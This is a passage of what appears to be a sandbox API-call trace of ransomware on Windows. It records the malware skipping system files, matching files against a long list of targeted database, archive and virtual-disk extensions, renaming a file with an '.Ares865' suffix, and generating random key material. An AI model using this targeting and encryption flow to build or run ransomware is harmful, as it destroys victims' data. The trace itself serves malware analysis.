4 [0063.363] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.363] lstrlenW (lpString="wrk") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.363] lstrlenW (lpString="xdb") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.363] lstrlenW (lpString="xld") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.363] lstrlenW (lpString="xmlff") returned 5 [0063.363] lstrcmpiW (lpString1="s.htm", lpString2="xmlff") returned -1 [0063.363] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.Ares865") returned 88 [0063.363] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\bears.htm.ares865"), dwFlags=0x1) returned 1 [0063.364] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\bears.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.364] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=255) returned 1 [0063.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.365] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.365] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.366] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400, lpName=0x0) returned 0x164 [0063.368] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x190000 [0063.369] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.370] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.370] CloseHandle (hObject=0x164) returned 1 [0063.370] CloseHandle (hObject=0x154) returned 1 [0063.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.370] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa352261, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0063.370] lstrcmpiW (lpString1="Bears.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.370] lstrcmpiW (lpString1="Bears.jpg", lpString2="aoldtz.exe") returned 1 [0063.370] lstrcmpiW (lpString1="Bears.jpg", lpString2=".") returned 1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="..") returned 1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="windows") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="bootmgr") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="temp") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="pagefile.sys") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="boot") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="ids.txt") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="ntuser.dat") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="perflogs") returned -1 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2="MSBuild") returned -1 [0063.371] lstrlenW (lpString="Bears.jpg") returned 9 [0063.371] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 80 [0063.371] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Bears.jpg" | out: lpString1="Bears.jpg") returned="Bears.jpg" [0063.371] lstrlenW (lpString="Bears.jpg") returned 9 [0063.371] lstrlenW (lpString="Ares865") returned 7 [0063.371] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0063.371] lstrlenW (lpString=".dll") returned 4 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2=".dll") returned 1 [0063.371] lstrlenW (lpString=".lnk") returned 4 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2=".lnk") returned 1 [0063.371] lstrlenW (lpString=".ini") returned 4 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2=".ini") returned 1 [0063.371] lstrlenW (lpString=".sys") returned 4 [0063.371] lstrcmpiW (lpString1="Bears.jpg", lpString2=".sys") returned 1 [0063.371] lstrlenW (lpString="Bears.jpg") returned 9 [0063.371] lstrlenW (lpString="bak") returned 3 [0063.371] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.371] lstrlenW (lpString="ba_") returned 3 [0063.371] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.371] lstrlenW (lpString="dbb") returned 3 [0063.371] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.371] lstrlenW (lpString="vmdk") returned 4 [0063.371] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.371] lstrlenW (lpString="rar") returned 3 [0063.371] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.372] lstrlenW (lpString="zip") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.372] lstrlenW (lpString="tgz") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.372] lstrlenW (lpString="vbox") returned 4 [0063.372] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.372] lstrlenW (lpString="vdi") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.372] lstrlenW (lpString="vhd") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.372] lstrlenW (lpString="vhdx") returned 4 [0063.372] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.372] lstrlenW (lpString="avhd") returned 4 [0063.372] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.372] lstrlenW (lpString="db") returned 2 [0063.372] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.372] lstrlenW (lpString="db2") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.372] lstrlenW (lpString="db3") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.372] lstrlenW (lpString="dbf") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.372] lstrlenW (lpString="mdf") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.372] lstrlenW (lpString="mdb") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.372] lstrlenW (lpString="sql") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.372] lstrlenW (lpString="sqlite") returned 6 [0063.372] lstrcmpiW (lpString1="rs.jpg", lpString2="sqlite") returned -1 [0063.372] lstrlenW (lpString="sqlite3") returned 7 [0063.372] lstrcmpiW (lpString1="ars.jpg", lpString2="sqlite3") returned -1 [0063.372] lstrlenW (lpString="sqlitedb") returned 8 [0063.372] lstrcmpiW (lpString1="ears.jpg", lpString2="sqlitedb") returned -1 [0063.372] lstrlenW (lpString="xml") returned 3 [0063.372] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.372] lstrlenW (lpString="$er") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.373] lstrlenW (lpString="4dd") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.373] lstrlenW (lpString="4dl") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.373] lstrlenW (lpString="^^^") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.373] lstrlenW (lpString="abs") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.373] lstrlenW (lpString="abx") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.373] lstrlenW (lpString="accdb") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0063.373] lstrlenW (lpString="accdc") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0063.373] lstrlenW (lpString="accde") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0063.373] lstrlenW (lpString="accdr") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0063.373] lstrlenW (lpString="accdt") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0063.373] lstrlenW (lpString="accdw") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0063.373] lstrlenW (lpString="accft") returned 5 [0063.373] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0063.373] lstrlenW (lpString="adb") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.373] lstrlenW (lpString="adb") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.373] lstrlenW (lpString="ade") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.373] lstrlenW (lpString="adf") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.373] lstrlenW (lpString="adn") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.373] lstrlenW (lpString="adp") returned 3 [0063.373] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.374] lstrlenW (lpString="alf") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.374] lstrlenW (lpString="ask") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.374] lstrlenW (lpString="btr") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.374] lstrlenW (lpString="cat") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.374] lstrlenW (lpString="cdb") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.374] lstrlenW (lpString="ckp") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.374] lstrlenW (lpString="cma") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.374] lstrlenW (lpString="cpd") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.374] lstrlenW (lpString="dacpac") returned 6 [0063.374] lstrcmpiW (lpString1="rs.jpg", lpString2="dacpac") returned 1 [0063.374] lstrlenW (lpString="dad") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.374] lstrlenW (lpString="dadiagrams") returned 10 [0063.374] lstrlenW (lpString="daschema") returned 8 [0063.374] lstrcmpiW (lpString1="ears.jpg", lpString2="daschema") returned 1 [0063.374] lstrlenW (lpString="db-journal") returned 10 [0063.374] lstrlenW (lpString="db-shm") returned 6 [0063.374] lstrcmpiW (lpString1="rs.jpg", lpString2="db-shm") returned 1 [0063.374] lstrlenW (lpString="db-wal") returned 6 [0063.374] lstrcmpiW (lpString1="rs.jpg", lpString2="db-wal") returned 1 [0063.374] lstrlenW (lpString="dbc") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.374] lstrlenW (lpString="dbs") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.374] lstrlenW (lpString="dbt") returned 3 [0063.374] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.374] lstrlenW (lpString="dbv") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.375] lstrlenW (lpString="dbx") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.375] lstrlenW (lpString="dcb") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.375] lstrlenW (lpString="dct") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.375] lstrlenW (lpString="dcx") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.375] lstrlenW (lpString="ddl") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.375] lstrlenW (lpString="dlis") returned 4 [0063.375] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.375] lstrlenW (lpString="dp1") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.375] lstrlenW (lpString="dqy") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.375] lstrlenW (lpString="dsk") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.375] lstrlenW (lpString="dsn") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.375] lstrlenW (lpString="dtsx") returned 4 [0063.375] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.375] lstrlenW (lpString="dxl") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.375] lstrlenW (lpString="eco") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.375] lstrlenW (lpString="ecx") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.375] lstrlenW (lpString="edb") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.375] lstrlenW (lpString="epim") returned 4 [0063.375] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.375] lstrlenW (lpString="fcd") returned 3 [0063.375] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.375] lstrlenW (lpString="fdb") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.376] lstrlenW (lpString="fic") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.376] lstrlenW (lpString="flexolibrary") returned 12 [0063.376] lstrlenW (lpString="fm5") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.376] lstrlenW (lpString="fmp") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.376] lstrlenW (lpString="fmp12") returned 5 [0063.376] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0063.376] lstrlenW (lpString="fmpsl") returned 5 [0063.376] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0063.376] lstrlenW (lpString="fol") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.376] lstrlenW (lpString="fp3") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.376] lstrlenW (lpString="fp4") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.376] lstrlenW (lpString="fp5") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.376] lstrlenW (lpString="fp7") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.376] lstrlenW (lpString="fpt") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.376] lstrlenW (lpString="frm") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.376] lstrlenW (lpString="gdb") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.376] lstrlenW (lpString="gdb") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.376] lstrlenW (lpString="grdb") returned 4 [0063.376] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.376] lstrlenW (lpString="gwi") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.376] lstrlenW (lpString="hdb") returned 3 [0063.376] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.376] lstrlenW (lpString="his") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.377] lstrlenW (lpString="ib") returned 2 [0063.377] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.377] lstrlenW (lpString="idb") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.377] lstrlenW (lpString="ihx") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.377] lstrlenW (lpString="itdb") returned 4 [0063.377] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.377] lstrlenW (lpString="itw") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.377] lstrlenW (lpString="jet") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.377] lstrlenW (lpString="jtx") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.377] lstrlenW (lpString="kdb") returned 3 [0063.377] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.377] lstrlenW (lpString="kexi") returned 4 [0063.377] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.377] lstrlenW (lpString="kexic") returned 5 [0063.377] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0063.378] lstrlenW (lpString="kexis") returned 5 [0063.378] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0063.378] lstrlenW (lpString="lgc") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.378] lstrlenW (lpString="lwx") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.378] lstrlenW (lpString="maf") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.378] lstrlenW (lpString="maq") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.378] lstrlenW (lpString="mar") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.378] lstrlenW (lpString="marshal") returned 7 [0063.378] lstrcmpiW (lpString1="ars.jpg", lpString2="marshal") returned -1 [0063.378] lstrlenW (lpString="mas") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.378] lstrlenW (lpString="mav") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.378] lstrlenW (lpString="maw") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.378] lstrlenW (lpString="mdbhtml") returned 7 [0063.378] lstrcmpiW (lpString1="ars.jpg", lpString2="mdbhtml") returned -1 [0063.378] lstrlenW (lpString="mdn") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.378] lstrlenW (lpString="mdt") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.378] lstrlenW (lpString="mfd") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.378] lstrlenW (lpString="mpd") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.378] lstrlenW (lpString="mrg") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.378] lstrlenW (lpString="mud") returned 3 [0063.378] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.378] lstrlenW (lpString="mwb") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.379] lstrlenW (lpString="myd") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.379] lstrlenW (lpString="ndf") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.379] lstrlenW (lpString="nnt") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.379] lstrlenW (lpString="nrmlib") returned 6 [0063.379] lstrcmpiW (lpString1="rs.jpg", lpString2="nrmlib") returned 1 [0063.379] lstrlenW (lpString="ns2") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.379] lstrlenW (lpString="ns3") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.379] lstrlenW (lpString="ns4") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.379] lstrlenW (lpString="nsf") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.379] lstrlenW (lpString="nv") returned 2 [0063.379] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.379] lstrlenW (lpString="nv2") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.379] lstrlenW (lpString="nwdb") returned 4 [0063.379] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.379] lstrlenW (lpString="nyf") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.379] lstrlenW (lpString="odb") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.379] lstrlenW (lpString="odb") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.379] lstrlenW (lpString="oqy") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.379] lstrlenW (lpString="ora") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.379] lstrlenW (lpString="orx") returned 3 [0063.379] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.379] lstrlenW (lpString="owc") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.380] lstrlenW (lpString="p96") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.380] lstrlenW (lpString="p97") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.380] lstrlenW (lpString="pan") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.380] lstrlenW (lpString="pdb") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.380] lstrlenW (lpString="pdm") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.380] lstrlenW (lpString="pnz") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.380] lstrlenW (lpString="qry") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.380] lstrlenW (lpString="qvd") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.380] lstrlenW (lpString="rbf") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.380] lstrlenW (lpString="rctd") returned 4 [0063.380] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.380] lstrlenW (lpString="rod") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.380] lstrlenW (lpString="rodx") returned 4 [0063.380] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.380] lstrlenW (lpString="rpd") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.380] lstrlenW (lpString="rsd") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.380] lstrlenW (lpString="sas7bdat") returned 8 [0063.380] lstrcmpiW (lpString1="ears.jpg", lpString2="sas7bdat") returned -1 [0063.380] lstrlenW (lpString="sbf") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.380] lstrlenW (lpString="scx") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.380] lstrlenW (lpString="sdb") returned 3 [0063.380] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.381] lstrlenW (lpString="sdc") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.381] lstrlenW (lpString="sdf") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.381] lstrlenW (lpString="sis") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.381] lstrlenW (lpString="spq") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.381] lstrlenW (lpString="te") returned 2 [0063.381] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.381] lstrlenW (lpString="teacher") returned 7 [0063.381] lstrcmpiW (lpString1="ars.jpg", lpString2="teacher") returned -1 [0063.381] lstrlenW (lpString="tmd") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.381] lstrlenW (lpString="tps") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.381] lstrlenW (lpString="trc") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.381] lstrlenW (lpString="trc") returned 3 [0063.381] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.381] 